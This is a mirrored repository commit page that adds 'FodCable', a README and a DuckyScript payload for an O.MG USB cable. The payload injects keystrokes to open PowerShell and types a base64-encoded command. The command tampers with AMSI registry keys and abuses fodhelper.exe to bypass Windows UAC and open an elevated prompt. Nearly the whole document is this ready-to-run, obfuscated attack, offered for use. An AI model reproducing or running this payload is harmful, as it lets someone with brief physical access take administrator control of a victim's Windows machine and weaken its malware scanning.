mirror of https://github.com/hak5/omg-payloads.git
Uploaded FodCable - UAC Bypass
Bypass UAC and get an elevated command prompt using a modified version of the well known Fodhelper method.pull/16/head
parent
41c54164a9
commit
ec60e847eb
|
@ -0,0 +1,11 @@
|
|||
**Title: FodCable - UAC Bypass**
|
||||
|
||||
Author: 0iphor13
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is FodCable?
|
||||
#
|
||||
*Use your O.MG Cable / Plug to bypass UAC using the old & well known Fodhelper.exe method, slightly modified*
|
||||
*It is likely that this will trigger Windows Defender - But still opening an elevated command prompt in 2022*
|
||||
#
|
|
@ -0,0 +1,46 @@
|
|||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 250
|
||||
ENTER
|
||||
|
||||
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC
|
||||
DELAY 200
|
||||
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA
|
||||
DELAY 200
|
||||
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
|
||||
DELAY 200
|
||||
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
|
||||
DELAY 200
|
||||
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
|
||||
DELAY 200
|
||||
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
|
||||
DELAY 200
|
||||
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
|
||||
DELAY 200
|
||||
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
|
||||
DELAY 200
|
||||
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
|
||||
DELAY 200
|
||||
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
|
||||
DELAY 200
|
||||
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
|
||||
DELAY 200
|
||||
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
|
||||
DELAY 200
|
||||
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
|
||||
DELAY 200
|
||||
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
|
||||
DELAY 200
|
||||
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
|
||||
DELAY 200
|
||||
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
|
||||
DELAY 200
|
||||
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
|
||||
DELAY 200
|
||||
STRING pAGQAZABlAG4AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAzAA==;Start-Sleep -s 3;exit
|
||||
DELAY 100
|
||||
ENTER
|
Loading…
Reference in New Issue